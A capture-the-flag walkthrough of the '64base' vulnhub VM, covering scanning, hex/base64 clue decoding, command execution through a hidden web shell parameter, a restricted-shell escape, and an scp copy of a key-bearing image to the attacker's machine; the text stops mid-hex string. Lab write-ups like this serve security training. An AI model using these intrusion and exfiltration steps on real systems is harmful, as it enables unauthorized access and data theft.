64Base - Walkthrough




It's been a while since I've been able to work on a vulnhub image. I started looking at recent releases and came across 64base. This VM has a Star Wars theme which is always great. Plus, it was 3mrgnc3's first public VM so I had to check it out!





Flag1


We start off with running Netdiscover to find the IP address of this image:


eric@geoda:~/Documents/vulnhub/64base$ sudo netdiscover -r 192.168.56.0/24 -i vboxnet0
[sudo] password for eric: 

 Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                                                                                                        
                                                                                                                                                                                                            
 2 Captured ARP Req/Rep packets, from 2 hosts.   Total size: 120                                                                                                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.100  08:00:27:ac:0e:b4      1      60  PCS Systemtechnik GmbH                                                                                                                                   
 192.168.56.103  08:00:27:68:e7:f8      1      60  PCS Systemtechnik GmbH                                                                                                                                   

eric@geoda:~/Documents/vulnhub/64base$ 

Since the DHCP server is .100, we see that 192.168.56.103 is our target. Let's conduct an nmap scan against this to see what we are working with:


eric@geoda:~/Documents/vulnhub/64base$ sudo nmap -p- -sV 192.168.56.103

Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-30 22:27 CDT
Nmap scan report for 192.168.56.103
Host is up (0.00012s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh?
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
4899/tcp  open  radmin?
62964/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
[...snippet...]
MAC Address: 08:00:27:68:E7:F8 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.19 seconds
eric@geoda:~/Documents/vulnhub/64base$ 

Very interesting. Looks like we are working with a few ports: 22, 80, 4899 and 62964.

I take a quick look at each:

First I check out port 22:


eric@geoda:/tmp$ nc -nv 192.168.56.103 22
(UNKNOWN) [192.168.56.103] 22 (ssh) open
The programs included with the Fedora GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Fedora GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Oct 24 02:04:10 4025 from 010.101.010.001

#
HI  
HI
^C
eric@geoda:/tmp$ 

Appears to be SSH.. or at least pretending to be.

I then check out port 4899:


eric@geoda:/tmp$ nc -nv 192.168.56.103 4899
(UNKNOWN) [192.168.56.103] 4899 (radmin-port) open
sshhh! ssh! droids!























































So..

You found a way in then...

but, can you pop root?



                                           /~\
                                          |oo )    Did you hear that?
                                          _\=/_
                          ___            /  _  \
                         / ()\          //|/.\|\\
                       _|_____|_        \\ \_/  ||
                      | | === | |        \|\ /| ||
                      |_|  O  |_|        # _ _/ #
                       ||  O  ||          | | |
                       ||__*__||          | | |
                      |~ \___/ ~|         []|[]
                      /=\ /=\ /=\         | | |
      ________________[_]_[_]_[_]________/_]_[_\_________________________


eric@geoda:/tmp$ 


This has 2 droids talking amongst each other, but I'm not sure exactly what this means. I will table this in case it comes in handy later.

I then check out port 62964:


eric@geoda:/tmp$ nc -nv 192.168.56.103 62964
(UNKNOWN) [192.168.56.103] 62964 (?) open
SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u3
HI
Protocol mismatch.
eric@geoda:/tmp$ 

Now THIS looks like an SSH service. I will make note of this as my first SSH connection if it comes down to it.

Lastly, let's take a look at port 80. I fire up the browser:



Looking at the title, I see some text that appears to be encoded with base64. I take it to the terminal and decode:


eric@geoda:~/Documents/vulnhub/64base$ echo "dmlldyBzb3VyY2UgO0QK" | base64 -d
view source ;D
eric@geoda:~/Documents/vulnhub/64base$ 


It hints for me to view the source.

When checking the page source, I see a comment right below that same sub heading:


5a6d78685a7a4637546d705361566c59546d785062464a7654587056656c464953587055616b4a56576b644752574e7151586853534842575555684b6246524551586454656b5a77596d316a4d454e6e5054313943673d3d0a

This value appears to be in hexadecimal. The quickest way I can think of to decode this value is via Burp.



So I fire it up and see that after decoding the hex value, it then produces a base64 string. I took that value and decoded it and we get our first flag!


flag1{NjRiYXNlOlRoMzUzQHIzTjBUZGFEcjAxRHpVQHJlTDAwSzFpbmc0Cg==}

Flag2

After finding flag1, I notice its contents are also in base64. I decode and I'm presented with the following:


eric@geoda:~/Documents/vulnhub/64base$ echo "NjRiYXNlOlRoMzUzQHIzTjBUZGFEcjAxRHpVQHJlTDAwSzFpbmc0Cg==" | base64 -d
64base:Th353@r3N0TdaDr01DzU@reL00K1ing4
eric@geoda:~/Documents/vulnhub/64base$ 

Based off this value, the first thing I think of are credentials. I immediately think about SSH and try logging into the 2 "SSH" ports that we found. Turns out that port 62964 is the correct port running the service. However, this was without success.


After a ton of enumeration with dirb and Burp, I found that there were some rabbit holes in regards to the 200 status codes that were presented. I decided to read over the website a bit more and figured that generating a wordlist from it may help with further enumeration. I use wget to accomplish this.

I first pull down the first 2 levels of the website:


eric@geoda:~/Documents/vulnhub/64base$ wget -r -l 2 192.168.56.103
--2017-04-30 23:20:49--  http://192.168.56.103/
Connecting to 192.168.56.103:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8159 (8.0K) [text/html]
Saving to: ‘192.168.56.103/index.html’

192.168.56.103/index.html                           100%[================================================================================================================>]   7.97K  --.-KB/s    in 0s      

2017-04-30 23:20:49 (1.01 GB/s) - ‘192.168.56.103/index.html’ saved [8159/8159]

Loading robots.txt; please ignore errors.
--2017-04-30 23:20:49--  http://192.168.56.103/robots.txt
Reusing existing connection to 192.168.56.103:80.
HTTP request sent, awaiting response... 200 OK
Length: 8196 (8.0K) [text/plain]
Saving to: ‘192.168.56.103/robots.txt’

[...snippet...]

2017-04-30 23:20:49 (155 MB/s) - ‘192.168.56.103/img/contact-bg.jpg’ saved [95838/95838]

FINISHED --2017-04-30 23:20:49--
Total wall clock time: 0.03s
Downloaded: 31 files, 1.8M in 0.009s (198 MB/s)
eric@geoda:~/Documents/vulnhub/64base$ 

I then replace any spaces with a new line and sort by unique instances:


eric@geoda:~/Documents/vulnhub/64base$ grep -hr "" 192.168.56.103/| tr '[:space:]' '\n' | sort | uniq > wordlist.txt

Now we just have to remove any html tags and weird characters:


egrep -v '('\,'|'\;'|'\}'|'\{'|'\<'|'\>'|'\:'|'\='|'\"'|'\/'|'\/'|'\['|'\]')' wordlist.txt | sort -u > wordlist-clean.txt

We now have a custom wordlist based off the website:


eric@geoda:~/Documents/vulnhub/64base$ wc -l wordlist-clean.txt 
26455 wordlist-clean.txt
eric@geoda:~/Documents/vulnhub/64base$

With our custom wordlist created, I turn to Burp and the Intruder to start running through it.

I look at all 200's, 300's and 400's. When searching I notice a 401 status code that caught my eye:


I see that the payload Imperial-Class gives a 401 status code indicating that we are unauthorized to view this page. I navigate to the page to see the reason why:


Ah-ha! A login screen. I remember the "credentials" that were given to us from flag1. I submit the credentials and I'm presented with a new page!


Interesting. So I check its page source and see the following message:


<!DOCTYPE html>
<html lang="en">
<body bgcolor=#000000><font color=#cfbf00>
<title>64base - login</title>
<h3>[☠] ERROR: incorrect path!.... TO THE DARK SIDE!</h3>
<!-- don't forget the BountyHunter login -->

Looks like a hint to me. But what? I added BountyHunter as the next path in the URL and I'm presented with a login screen:


Excellent! Another login screen. I try the same credentials that got me to the page to see if this works.

They failed.

However! When navigating to the page source, we notice a comment!


<body bgcolor=#000000><font color=#cfbf00>
<form name="login-form" id="login-form" method="post" action="./login.php"> 
  <fieldset> 
  <legend>Please login:</legend> 
  <dl> 
    <dt> 
      <label title="Username">Username:
      <input tabindex="1" accesskey="u" name="function" type="text" maxlength="50" id="5a6d78685a7a4a37595568534d474e4954545a4d65546b7a5a444e6a645756" /> 
      </label> 
    </dt> 
  </dl> 
  <dl> 
    <dt> 
      <label title="Password">Password:
      <input tabindex="2" accesskey="p" name="command" type="password" maxlength="15" id="584f54466b53465a70576c4d31616d49794d485a6b4d6b597757544a6e4c32" /> 
            </label> 
    </dt> 
  </dl> 
  <dl> 
    <dt> 
      <label title="Submit"> 
      <input tabindex="3" accesskey="l" type="submit" name="cmdlogin" value="Login" /> 
      <!-- basictoken=52714d544a54626d51315a45566157464655614446525557383966516f3d0a -->
      </label> 
    </dt> 
  </dl> 
  </fieldset> 
</form>


There's a comment with "basictoken=52714d544a54626d51315a45566157464655614446525557383966516f3d0a"

I noticed it was in hex. I tried to decode it and it appeared to come back in base64. However, when decoding that text, it came back as gibberish. After a while I noticed that the Username and Password ID were both in hex as well. I decided to combine all 3 strings and run the decode again:


Excellent! We have found flag2:


flag2{aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj12Snd5dEZXQTh1QQo=}
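The hex-then-base64 layering behind flag1 and flag2 can also be peeled without Burp. The following is an added example, not part of the original walkthrough; the function names are hypothetical and the input strings are the ones shown in the page sources above. It also shows why the basictoken on its own failed to decode: it is the tail of a base64 string that starts in the two input ids, so alone it is not a whole number of 4-character groups.

```python
import base64
import binascii
import re
from typing import NamedTuple

# Values copied from this page: the hex comment behind flag1, and the two
# input ids plus the basictoken comment from the BountyHunter login form.
FLAG1_HEX = (
    "5a6d78685a7a4637546d705361566c59546d785062464a7654587056656c464953587055"
    "616b4a56576b644752574e7151586853534842575555684b6246524551586454656b5a77"
    "596d316a4d454e6e5054313943673d3d0a"
)
USERNAME_ID = "5a6d78685a7a4a37595568534d474e4954545a4d65546b7a5a444e6a645756"
PASSWORD_ID = "584f54466b53465a70576c4d31616d49794d485a6b4d6b597757544a6e4c32"
BASICTOKEN = "52714d544a54626d51315a45566157464655614446525557383966516f3d0a"

HEX_RE = re.compile(r"(?:[0-9a-fA-F]{2})+")
B64_RE = re.compile(r"[A-Za-z0-9+/]+={0,2}")
FLAG_RE = re.compile(r"(flag\d)\{(.+)\}")


class Peeled(NamedTuple):
    text: str     # innermost value that could not be decoded any further
    layers: list  # names of the layers removed, outermost first


def _printable(raw: bytes) -> bool:
    """True when every byte is printable ASCII or common whitespace."""
    return all(32 <= b < 127 or b in (9, 10, 13) for b in raw)


def _step(text: str):
    """Remove one layer; return (layer_name, inner_text) or None."""
    wrapped = FLAG_RE.fullmatch(text)
    if wrapped:
        return wrapped.group(1), wrapped.group(2)
    try:
        # Hex is tested first: every hex digit is also a base64 character.
        if HEX_RE.fullmatch(text):
            name, raw = "hex", bytes.fromhex(text)
        elif B64_RE.fullmatch(text) and len(text) % 4 == 0:
            name, raw = "base64", base64.b64decode(text, validate=True)
        else:
            return None
    except (ValueError, binascii.Error):
        return None
    # Binary output means this was not really an encoding layer: stop here
    # instead of handing gibberish to the next round.
    if not _printable(raw):
        return None
    return name, raw.decode("ascii").strip()


def peel(value: str, max_layers: int = 8) -> Peeled:
    """Strip hex, base64 and flagN{...} wrappers until none applies."""
    text, layers = value.strip(), []
    for _ in range(max_layers):
        step = _step(text)
        if step is None:
            break
        layers.append(step[0])
        text = step[1]
    return Peeled(text, layers)


if __name__ == "__main__":
    print(peel(FLAG1_HEX))
    # The token alone stops after the hex layer (30 base64 characters).
    print(peel(BASICTOKEN))
    # Username id + password id + token, in form order, decode cleanly.
    print(peel(USERNAME_ID + PASSWORD_ID + BASICTOKEN))
```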

Flag3

Again, we notice the contents of flag2 are base64 encoded. We decode and are presented with the following:


eric@geoda:~/Documents/vulnhub/64base$ echo "aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj12Snd5dEZXQTh1QQo=" | base64 -d
https://www.youtube.com/watch?v=vJwytFWA8uA
eric@geoda:~/Documents/vulnhub/64base$ 

A YouTube link. Interesting. I check it out and it appears to be calling for Burp.

I fire up Burp and start playing with the Intruder to see if I can find more information about this /Imperial-Class/BountyHunter/ directory.



I noticed that when I went directly to the /index.php directory, a 302 status code redirect was present. And what do we have here.. it's flag3!



flag3{NTNjcjN0NWgzNzcvSW1wZXJpYWwtQ2xhc3MvQm91bnR5SHVudGVyL2xvZ2luLnBocD9mPWV4ZWMmYz1pZAo=}


Flag4


Now that we have flag3, it appears to be yet another base64 encoded string. So I decode it:


eric@geoda:~/Documents/vulnhub/64base$ echo "NTNjcjN0NWgzNzcvSW1wZXJpYWwtQ2xhc3MvQm91bnR5SHVudGVyL2xvZ2luLnBocD9mPWV4ZWMmYz1pZAo=" | base64 -d
53cr3t5h377/Imperial-Class/BountyHunter/login.php?f=exec&c=id
eric@geoda:~/Documents/vulnhub/64base$ 


Interesting. It appears to say "53cr3t5h377/Imperial-Class/BountyHunter/login.php?f=exec&c=id"

I take this to the browser, however the page does not exist. Hmm. I remember that there was another page that referenced "53cr3t 5h377"  which was the WANTED poster found on the main blog:


At the bottom it says "IMPORTANT!!! USE SYSTEM INSTEAD OF EXEC TO RUN THE SECRET 5H377"

I take a stab at it and update the URL to add the parameters f=exec&c=id which were the contents of the flag but replace exec with system instead:


http://192.168.56.103/Imperial-Class/BountyHunter/login.php?f=system&c=id


Ah-ha! It worked. I see flag4!


flag4{NjRiYXNlOjY0YmFzZTVoMzc3Cg==}

Flag5

Now that we have flag4, it too looks like it's in base64. I'm really starting to see a pattern here! I decode it and I'm left with:


eric@geoda:~/Documents/vulnhub/64base$ echo "NjRiYXNlOjY0YmFzZTVoMzc3Cg==" | base64 -d
64base:64base5h377
eric@geoda:~/Documents/vulnhub/64base$ 


This looks like credentials again. I try against SSH port 62964 but with no success.

eric@geoda:~/Documents/vulnhub/64base$ ssh 64base@192.168.56.103 -p 62964
64base@192.168.56.103's password: 
Permission denied, please try again.
64base@192.168.56.103's password: 

eric@geoda:~/Documents/vulnhub/64base$ 

After thinking long and hard, I remember that this VM has a lot of base64 encoding. I decide to encode the password "64base5h377" into base64 and try to login again:


eric@geoda:~/Documents/vulnhub/64base$ ssh 64base@192.168.56.103 -p 62964
64base@192.168.56.103's password: 

Last login: Tue Apr 25 18:26:31 2017 from 192.168.56.1
64base@64base:~$ 

Success!! I am on the box! Now to begin enumerating around.

The first thing I notice is the restricted shell and lack of commands I can use:


eric@geoda:~$ ssh 64base@192.168.56.103 -p 62964
64base@192.168.56.103's password: 

Last login: Mon May  1 11:04:18 2017 from 192.168.56.1
64base@64base:~$ clear
-rbash: clear: command not found
64base@64base:~$ ls
well_done_:D
64base@64base:~$ cd /
-rbash: cd: restricted
64base@64base:~$ find / -iname flag5
           __________        
       _xXXXXXXXXXXXXXXXx_
     .-         |         -.         
   _/___________|___________\_
  /             |       __    \
 / _____________|      /__\    \
/               |      \__/     \    
|               |               |      
 HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH    
|           |   |  ___   ___    |       
\           |   | |== | |==/    /         
 \__________|   | |__| |__/    /      
  \_________|___|_____________/ 
    \           |      /    / 
     `-_________|_____/___-'
            \. \|/ ./
              `-+-'
                I
               [ ]
       LS   |==| |==]]
               `-'

   Cybot Galactica's AC1 "Spy-Eye"
         Surveillance Droid
64base@64base:~$ whoami
-rbash: whoami: command not found
64base@64base:~$ pwd
/64base
64base@64base:~$ id
-rbash: id: command not found
64base@64base:~$ ls -lah
well_done_:D
64base@64base:~$ 


As you can see, I tried whoami, id, ls, find, cd and many more which I don't have shown.

What is a restricted shell anyway? It's essentially a way to limit the user's ability and allow them only a subset of commands to be executed. 

I did some research and found a great write-up by SANS on escaping restricted Linux shells:

https://pen-testing.sans.org/blog/2012/06/06/escaping-restricted-linux-shells

The first thing they recommend is to run the "env" command to understand how your profile is configured. So, that's exactly what I do:


64base@64base:~$ env
TERM=xterm-256color
SHELL=/bin/rbash
SSH_CLIENT=192.168.56.1 51084 62964
SSH_TTY=/dev/pts/0
USER=64base
LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.axv=01;35:*.anx=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.axa=00;36:*.oga=00;36:*.spx=00;36:*.xspf=00;36:
MAIL=/var/mail/64base
PATH=/var/alt-bin
PWD=/64base
LANG=en_GB.UTF-8
GCC_COLORS=error=01;31:warning=01;35:note=01;36:caret=01;32:locus=01:quote=01
SHLVL=1
HOME=/64base
LANGUAGE=en_GB:en
LOGNAME=64base
SSH_CONNECTION=192.168.56.1 51084 192.168.56.103 62964
_=/var/alt-bin/env
64base@64base:~$ 

Interesting, it looks like a custom PATH=/var/alt-bin. Usually you would run ls to list the contents of the directory, but since this is restricted, I can still use the echo command with an asterisk to 'glob' directory contents.


64base@64base:~$ echo /var/alt-bin/*
/var/alt-bin/awk /var/alt-bin/base64 /var/alt-bin/cat /var/alt-bin/dircolors /var/alt-bin/droids /var/alt-bin/egrep /var/alt-bin/env /var/alt-bin/fgrep /var/alt-bin/file /var/alt-bin/find /var/alt-bin/grep /var/alt-bin/head /var/alt-bin/less /var/alt-bin/ls /var/alt-bin/more /var/alt-bin/perl /var/alt-bin/python /var/alt-bin/ruby /var/alt-bin/tail
64base@64base:~$ 

Usually, once I know which commands I can execute, I would research each one of them to see if there are known shell escapes associated with them. However, a particular file caught my eye: /var/alt-bin/droids

I run it to see what happens:



64base@64base:~$ /var/alt-bin/droids
-rbash: /var/alt-bin/droids: restricted: cannot specify `/' in command names
64base@64base:~$ 


Bah! That didn't work. But how about just "droids"? Since this is found directly in my $PATH, I should be able to run droids all by itself without specifying the full path.

I type droids and all of a sudden I'm presented with the matrix:

  

I was able to escape with Ctrl+C and now I'm presented with an ASCII image:


64base@64base:~$ droids

So..

You found a way in then...

but, can you pop root?



                                           /~\
                                          |oo )    Did you hear that?
                                          _\=/_
                          ___            /  _  \
                         / ()\          //|/.\|\\
                       _|_____|_        \\ \_/  ||
                      | | === | |        \|\ /| ||
                      |_|  O  |_|        # _ _/ #
                       ||  O  ||          | | |
                       ||__*__||          | | |
                      |~ \___/ ~|         []|[]
                      /=\ /=\ /=\         | | |
      ________________[_]_[_]_[_]________/_]_[_\_________________________

64base@64base:~$ 

Interesting. What just happened? For some reason I get the urge to run env again since this is where I found the droids path and I'm presented with a properly updated $PATH!


64base@64base:~$ env
TERM=xterm-256color
SHELL=/bin/rbash
SSH_CLIENT=192.168.56.1 51084 62964
SSH_TTY=/dev/pts/0
USER=64base
LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.axv=01;35:*.anx=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.axa=00;36:*.oga=00;36:*.spx=00;36:*.xspf=00;36:
MAIL=/var/mail/64base
PATH=/var/alt-bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
PWD=/64base
LANG=en_GB.UTF-8
GCC_COLORS=error=01;31:warning=01;35:note=01;36:caret=01;32:locus=01:quote=01
SHLVL=3
HOME=/64base
LANGUAGE=en_GB:en
LOGNAME=64base
SSH_CONNECTION=192.168.56.1 51084 192.168.56.103 62964
_=/var/alt-bin/env
64base@64base:~$ 

I then use find to look for flag5 again:


64base@64base:~$ /usr/bin/find / -name *flag5* 2>/dev/null
/var/www/html/admin/S3cR37/flag5{TG9vayBJbnNpZGUhIDpECg==}
64base@64base:~$

Excellent! I found flag5:


flag5{TG9vayBJbnNpZGUhIDpECg==}  


Flag6

Per usual, I decode flag5:


64base@64base:~$ echo "TG9vayBJbnNpZGUhIDpECg==" | base64 -d
Look Inside! :D
64base@64base:~$ 

It is telling me to look inside. What does that mean? I run file on flag5 to see what they mean:


64base@64base:~$ file /var/www/html/admin/S3cR37/flag5{TG9vayBJbnNpZGUhIDpECg==}
/var/www/html/admin/S3cR37/flag5{TG9vayBJbnNpZGUhIDpECg==}: JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, comment: "4c5330744c5331435255644a546942535530456755464a4a566b4655525342", baseline, precision 8, 960x720, frames 3
64base@64base:~$ 

Looks like this is a JPEG image! It also has a weird comment that appears to be in hex. After I run xxd against it, I notice that the result is in, of course, base64! I decode that too:


64base@64base:~$ echo "4c5330744c5331435255644a546942535530456755464a4a566b4655525342" | xxd -p -r | base64 -d
-----BEGIN RSA PRIVATE base64: invalid input
64base@64base:~$ 

Ah-ha! It looks like the comment is the beginning of an RSA Private Key! Now, the real question is.. how do I extract the entire contents of this image? Usually I would run exiftool against this image but it is not installed.

My next idea is downloading the image locally and examining the file.

So, I start my SSH Server:


eric@geoda:~$ sudo service ssh status
 ssh.service - OpenBSD Secure Shell server
   Loaded: loaded (/lib/systemd/system/ssh.service; disabled; vendor preset: disabled)
   Active: active (running) since Tue 2017-05-02 21:04:37 CDT; 1min 18s ago
 Main PID: 6625 (sshd)
    Tasks: 1 (limit: 4915)
   CGroup: /system.slice/ssh.service
           └─6625 /usr/sbin/sshd -D

May 02 21:04:37 geoda systemd[1]: Starting OpenBSD Secure Shell server...
May 02 21:04:37 geoda sshd[6625]: Server listening on 0.0.0.0 port 22.
May 02 21:04:37 geoda sshd[6625]: Server listening on :: port 22.
May 02 21:04:37 geoda systemd[1]: Started OpenBSD Secure Shell server.
eric@geoda:~$

and SCP the file on over:


64base@64base:~$ scp /var/www/html/admin/S3cR37/flag5{TG9vayBJbnNpZGUhIDpECg==} eric@192.168.56.1:/tmp/flag5.jpg
Could not create directory '/64base/.ssh'.
The authenticity of host '192.168.56.1 (192.168.56.1)' can't be established.
ECDSA key fingerprint is 45:44:10:d9:e9:16:02:8b:86:b7:fc:b2:5b:a1:4c:10.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/64base/.ssh/known_hosts).
eric@192.168.56.1's password: 
flag5{TG9vayBJbnNpZGUhIDpECg==}                                                                                                                                            100%  192KB 192.0KB/s   00:00    
64base@64base:~$ 

Now that the file has been copied down, I give myself read rights and I run exiftool to completely examine the JPEG:


eric@geoda:/tmp$ ls -lah flag5.jpg 
-------r-- 1 eric eric 192K May  2 21:07 flag5.jpg
eric@geoda:/tmp$ chmod +r flag5.jpg 
eric@geoda:/tmp$ exiftool flag5.jpg 
ExifTool Version Number         : 10.40
File Name                       : flag5.jpg
Directory                       : .
File Size                       : 192 kB
File Modification Date/Time     : 2017:05:02 21:07:52-05:00
File Access Date/Time           : 2017:05:02 21:07:52-05:00
File Inode Change Date/Time     : 2017:05:02 21:10:34-05:00
File Permissions                : r--r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : inches
X Resolution                    : 72
Y Resolution                    : 72
Comment                         : [...snippet...]
Image Width                     : 960
Image Height                    : 720
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:4:4 (1 1)
Image Size                      : 960x720
Megapixels                      : 0.691
eric@geoda:/tmp$ 

I then take the contents of the Comment field, reverse the hex with xxd, and base64-decode the result again:


eric@geoda:/tmp$ echo "4c5330744c5331435255644a546942535530456755464a4a566b46555253424c52566b744c5330744c517051636d396a4c565235634755364944517352553544556c6c5156455645436b52460a5379314a626d5a764f69424252564d744d5449344c554e43517977324d6a46424d7a68425155513052546c475155457a4e6a55335130457a4f44673452446c434d7a553251776f4b625552300a556e684a643267304d464a54546b467a4d697473546c4a49646c4d356557684e4b325668654868564e586c795231424461334a6955566376556d64515543745352307043656a6c57636c52720a646c6c334e67705a59303931575756615457707a4e475a4a55473433526c7035536d64345230686f5533685262336857626a6c7252477433626e4e4e546b5270636e526a62304e50617a6c530a524546484e5756344f58673056453136436a684a624552435558453161546c5a656d6f35646c426d656d56435246706b53586f35524863795a323479553246465a335531656d56734b7a5a490a52303969526a686161444e4e53574e6f6554687a4d5668795254414b61335a4d53306b794e544a74656c64334e47746955334d354b31466856336c6f4d7a52724f45704a566e7031597a46520a51336c69656a56586231553157545532527a5a784d564a6b637a426959315a785446567a5a51704e5533704c617a4e745332465851586c4d574778764e3078756258467856555a4c5347356b0a516b557855326851566c5a704e47497752336c475355785054335a3062585a47596a5172656d68314e6d705056316c49436d73796147524453453554644374705a3264354f57686f4d3270680a52576456626c4e51576e56464e30354b6430525a5954646c553052685a3077784e31684c634774744d6c6c70516c5a7956566834566b31756232494b643168535a6a56435930644c56546b330a65475276636c59795648457261446c4c553278615a5463354f58527956484a475230356c4d4456326545527961576f315658517953324e52654373354f457334533342585441706e645570510a556c424c52326c71627a6b3253455248597a4e4d4e566c7a65453969566d63724c325a714d4546326330746d636d4e574c327834595663725357313562574d7854566870536b316962554e360a62455233436c52425632316863577453526b52355154464956585a30646c4e6c566e46544d533949616d6845647a6c6b4e45747a646e4e71613270326557565256484e7a5a6e4e6b52324e560a4d47684561316833556c647a6332514b4d6d517a5279744f616d3078556a56615445356e556d784f63465a48616d684c517a524263325a59557a4e4b4d486f796
4444e4355453035576b39430a54554a6c4f5552344f4870744e58684757546c365633527964677042523342794d454a6f4f45745264323177616c4656597a46685a6e4e78595646594d465649546b7859564446615431644c0a616d63305530457a57454d355a454e4665555a784d464e4a65464671547a6c4d52304e48436a52524e57356a5a6c566f62585a3063586c3164454e7362444a6b5746427a57465a455a54526c0a6230517851327432536b354557544e4c554663725232744f4f5577724f554e516554677252453531626b5a4a6433674b4b3151724b7a64525a7939315546684c6354524e4e6a464a555467770a4d7a52566148565356314d30564846514f57463657444e44527a6c4d65573970516a5a57596b74505a555233546a68686157784d533170436377706d57546c524e6b464e4d584e3562476c360a53444675626e684c5433526155566431636e68715230704353584d324d6e526c6245317259584d356555354e617a4e4d64546478556b6732633364504f584e6b56454a70436974714d4867300a64555261616b706a5a30315965475a694d4863315154593062466c4763303153656b5a714e31686b5a6e6b784f53744e5a54684b525768524f45744f57455233555574456556564d526b39550a63336f4b4d544e575a6b4a4f65466c7a65557731656b6459546e703563566f305